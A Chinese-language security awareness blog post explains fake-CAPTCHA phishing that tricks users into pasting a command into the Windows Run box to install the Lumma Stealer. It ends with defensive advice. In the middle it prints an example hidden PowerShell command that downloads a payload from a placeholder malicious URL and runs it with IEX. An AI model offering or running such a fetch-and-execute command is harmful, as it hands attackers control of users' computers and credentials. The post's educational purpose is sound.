乐于分享
好东西不私藏

上古技巧,永不落后,钓鱼引诱你按说明执行了恶意代码

上古技巧,永不落后,钓鱼引诱你按说明执行了恶意代码

你的一个回车,可能正把家门钥匙交给黑客

Win + R,CTRL + V,Enter。

这短短三步键盘操作,你每天可能会重复无数次。打开微信、启动游戏、运行某个快捷指令,行云流水,不过两三秒的事。

但如果你是在某个网页上,被要求“按此操作以验证人类身份”后执行了这三步,那么恭喜你——就在你敲下回车键的那一瞬间,你的电脑已经不再属于你了。

这不是危言耸听,而是2024年8月底,全球顶级网络安全机构Palo Alto Networks的威胁情报团队Unit 42发出的最新紧急警告。一种被称为“Lumma Stealer”的恶意软件,正通过这种看似荒诞的“验证码”钓鱼方式,疯狂入侵全球用户的电脑。

你以为你在证明自己是人类,实际上,你正在证明自己是个好骗的人类。

2024-08-28: More #Lumma #Stealer from pages instructing potential victims to copy/paste #PowerShell script in a Run window. —— Unit 42 @Unit42_Intel

最古老的骗术,往往最致命。 在赛博朋克的高科技外衣下,黑客们用的却是最原始的“钓鱼”手段。他们不需要寻找什么0day漏洞,不需要写几千行复杂的溢出代码,只需要利用人性的弱点,引诱你亲手按下那个万劫不复的回车键。

今天,我们就来扒一扒这个“上古技巧”的底裤,看看恶意代码如何伪装成一串字符串,又是如何在你的眼皮底下狂欢的。


荒诞的剧本:一场针对“人类”的精准筛选

想象一下这个场景:

你正在网上寻找某个稀缺的资源,或者试图访问一个看似独家的内部链接。突然,网页弹出一个提示框,画风可能极其粗糙,也可能伪装得和官方验证码一模一样:

“检测到异常流量,请验证您是否为人类。请按 Win + R 打开运行窗口,复制下方验证码并粘贴,按回车完成验证。”

下方,是一长串看似乱码的字符串。

很多人看到这里,第一反应是:这谁会信啊?这不就是骗傻子的吗?

没错,这恰恰是黑客最精明的地方——他们在做“目标用户筛查”。

正如网友@木雄·Space 所洞察的那样:

看上去就像是 一口南方口音的人给身在北方的我打电话【你听听我是谁……】的骗子一样。它们在做目标用户筛查…… 嘿!还真别说,还真有傻子能和骗子同频上。

那些懂一点电脑常识的人,看到“Win + R”和“粘贴运行”就会立刻警觉,转身离开。而那些能顺从地完成这三步操作的人,正是黑客最想要的“完美猎物”——他们缺乏基础的安全常识,对系统指令毫无防备,且具有极高的服从性。

这种“漏斗式”的筛选机制,极大地节省了黑客的攻击成本。他们不需要去攻克那些有着防火墙和杀毒软件的硬骨头,只需要把网撒进“傻白甜”的鱼塘。

网友@探姬 | Hello-CTF 的吐槽可谓一针见血:

你说是人类吧,确实是,AI不会这么蠢,他会告诉你这段命令存在安全风险;你说不是人类吧,也确实合理,因为这种事情不太像是人能干出来的。

黑客在赌,赌你的好奇心,赌你的盲从,更赌你对未知的恐惧(比如“不验证就无法访问”)。很遗憾,他们经常赢。


恶意代码,为何能是一串可复制的字符串?

面对这种骗局,很多电脑小白最大的疑问是:

所以恶意代码可以是一串可以复制的字符串吗?—— @加密电子猫

安全大佬给出了最简短有力的回答:可以的。

要理解这一点,我们需要明白Windows系统的一个核心机制——PowerShell

PowerShell是微软设计的一种强大的任务自动化和配置管理框架,它包含一个命令行Shell和一种脚本语言。简单来说,它就是Windows系统里的“上帝模式”,你可以通过输入文本命令,直接控制操作系统的每一个角落,从修改注册表、读写文件,到下载网络数据、截获密码,无所不能。

而黑客让你复制的那段“乱码”,本质上就是一个PowerShell恶意脚本的启动指令

它可能长这样: powershell -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://恶意网址/payload.ps1')"

这段代码翻译成人话就是: “悄悄地打开PowerShell,不要弹出任何黑窗口,去这个恶意网址下载真正的木马程序,并在本地运行它。”

你看到的只是一串英文字母和符号的组合,但在系统看来,这是一道不可违抗的圣旨。当你按下回车的那一刻,你的电脑就在毫秒级的时间内,完成了“下载-解密-执行”的全套动作。

你以为你只是验证了一个码,实际上你亲手给强盗打开了城门。

更可怕的是,这种攻击方式极其隐蔽。网友@Luc 感叹:

这玩意肉眼正看不出来啊。

确实,对于普通人来说,那段Base64编码或者混淆过的命令,就像天书一样。你根本无法从字面上判断它是安全的还是恶意的。而黑客正是利用了这种信息差,将致命的毒药裹在了“复制粘贴”的糖衣里。


安全策略的黑色幽默:防住了君子,防不住小人

在这个骗局中,最让人感到讽刺和无奈的,是Windows系统本身的安全机制。

微软并非没有意识到PowerShell的危险性。事实上,在默认情况下,Windows系统对脚本的运行是有严格限制的。网友@花贝 提到了一个关键点:

笑死,但是我记得Windows默认情况下是有对脚本运行做限制的🤔

没错,Windows默认的执行策略通常是“Restricted”,意味着你不能直接双击运行一个.ps1后缀的脚本文件。

但这恰恰是这个事件中最黑色幽默的地方。网友@KK 的吐槽道出了无数开发者的心酸:

最烦的是,你自己写一个有用的ps1脚本想运行特别难,各种阻拦和security policy默认设置禁止运行。。。而黑客代码用iex等调用都是一行代码就顶级权限跑的欢。

为什么会这样?

因为微软的安全策略防的是“文件”,而不是“命令行”。

当你把一个脚本保存为文件时,系统会拦截它;但当黑客通过“Win + R”运行窗口,或者直接在PowerShell控制台输入一行调用指令(如IEX,即Invoke-Expression)时,系统会认为这是用户主动发起的高权限操作,从而放行。

这就好比,你装了最顶级的防盗门,防住了外面拿着撬棍的贼,却对那个拿着你亲手递过去的钥匙、大摇大摆走进来的人毫无办法。

黑客绕过了文件落地的检测,直接在内存中加载和执行代码,这就是所谓的“无文件攻击”。没有文件,杀毒软件就找不到特征码,自然也就无法查杀。这种“降维打击”,让传统的安全防护形同虚设。


Lumma Stealer:潜伏在暗处的吸血鬼

那么,当你按下回车后,那个被悄悄下载运行的“Lumma Stealer”到底是什么?

Lumma Stealer,是一种高度复杂的窃密木马。 它不是来破坏你的系统的,因为系统崩溃了对它没好处。它的目的只有一个:偷,悄无声息地偷。

一旦它在你的电脑里扎根,它会像一只贪婪的吸血鬼,疯狂地吸食你的数字资产:

1.  浏览器数据全裸:它会提取Chrome、Edge等浏览器里保存的所有账号密码、Cookie、自动填充表单。你以为你的密码藏得很深?在它面前就是明文。

2.  加密钱包洗劫一空:它会专门针对MetaMask、Phantom等浏览器插件钱包进行定向打击,直接盗取你的私钥和助记词。

3.  两步验证(2FA)形同虚设:它甚至能读取你Google Authenticator等验证器应用的密钥,从而绕过二次验证。

4.  截屏与键盘记录:它会定时截取你的屏幕,记录你的每一次敲击,把你的隐私扒得底朝天。

在币圈,这种因为一次“复制粘贴”而导致倾家荡产的惨剧,每天都在上演。网友@无心的(钢铁侠)的留言,让人揪心:

余先生您好,我是一个罕见病重度残疾人,在欧易交易所平台上存的一万三千多个CORE币,就在微博群里认识相信了人家往他带单的IDEX软件上全部转过去了U还有我全部的家底子和自己借来的11万续命住院钱,都换成了U转到他那个地址上去了,您帮我通过他的地址能够帮我追回来吗?一共二十多万,有偿帮助跪谢

虽然这位网友遭遇的是另一种钓鱼骗局,但本质如出一辙:利用信任,引诱操作,一击致命。

二十多万,那是救命钱啊!但在黑客眼里,那只是屏幕上跳动的一串数字,是可以在暗网变现的筹码。他们不会管你是死是活,他们只关心今天的“收成”。

网友@Julian 的段子,虽然好笑,却透着彻骨的悲凉:

老百姓:我要报警,刚才被骗了

👮:怎么被骗的

老百姓:那人说需要银行卡,我就给他了,然后他又说还需要银行卡密码,我就告诉他了,谁知道他从ATM取完现金就跑了。这诈骗防不胜防,有什么办法能保护咱老百姓不受骗么?

👮:……

在技术面前,普通人的防线脆弱得就像一张纸。


如何守住最后的防线?

面对这种“上古技巧”的降维打击,我们真的就束手无策了吗?当然不是。再高明的骗术,也有其命门。守住底线,你只需要做到以下几点:

1. 铁律:永远不要在网页提示下执行“Win + R”

这是最核心的防线。任何正规的验证码,无论是图片验证、滑块验证还是短信验证,绝对不会要求你打开系统的“运行”窗口去执行代码。

只要网页上出现了“按Win+R”、“打开CMD”、“复制这段代码到运行窗口”等字眼,100%是诈骗! 毫无例外!

2. 警惕“复制粘贴”的陷阱

不要随意复制网页上不明来源的代码。尤其是那种长串的、你看不懂的英文字符。你以为复制的是文字,实际上复制的可能是毁灭你数字生活的引信。

3. 给浏览器和系统上把锁

虽然杀毒软件对无文件攻击效果有限,但开启Windows Defender的实时保护,安装防钓鱼的浏览器插件,依然能挡住大部分低级攻击。

更重要的是,不要给管理员权限! 很多恶意脚本之所以能畅通无阻,是因为当前用户就是管理员。如果系统弹出UAC(用户账户控制)提示,要求你确认权限,请务必看清楚是不是你自己主动发起的操作,不是的话,果断点“否”。

4. 数字资产,冷热分离

如果你持有大量的加密货币或其他高价值数字资产,请务必使用冷钱包(离线硬件钱包)。不要把所有的鸡蛋放在浏览器的插件里,那简直就是在黑客的锅边跳舞。


结语:技术再变,人性不变

从最早的“尼日利亚王子”邮件,到后来的“冒充公检法”电话,再到如今的“验证人类身份”PowerShell钓鱼,骗术的载体在升级,包装在变化,但内核从未改变。

黑客攻击的永远不是系统的漏洞,而是人性的漏洞。

贪婪、恐惧、好奇、盲从……这些刻在人类基因里的本能,是黑客取之不尽的弹药库。在赛博空间里,最大的安全软件,不是杀毒程序,而是你大脑里的那根弦。

上古技巧,永不落后,因为人性,永远可期。

下次,当你在屏幕前,面对那个要求你“Win + R,CTRL + V,Enter”的提示框时,请停下来,深呼吸,对屏幕比个中指,然后关掉那个网页。

因为你,比任何代码都更懂什么是真正的人类。


💬 互动时间:

你或者你身边的朋友,有没有遇到过类似的“高科技”钓鱼骗局?最后是怎么识破或者中招的?在评论区分享你的经历,让更多人避开这些坑!

👇 灵魂拷问:

如果网页上提示你“按Win+R输入cmd可以领红包”,你觉得你朋友中招吗?赶紧把这篇文章转发到相亲相爱一家人群,给他们打一剂预防针吧!

如果觉得这篇文章对你有启发,别忘了点个在看,你的每一次转发,都可能拯救一个即将按下回车键的“小白”。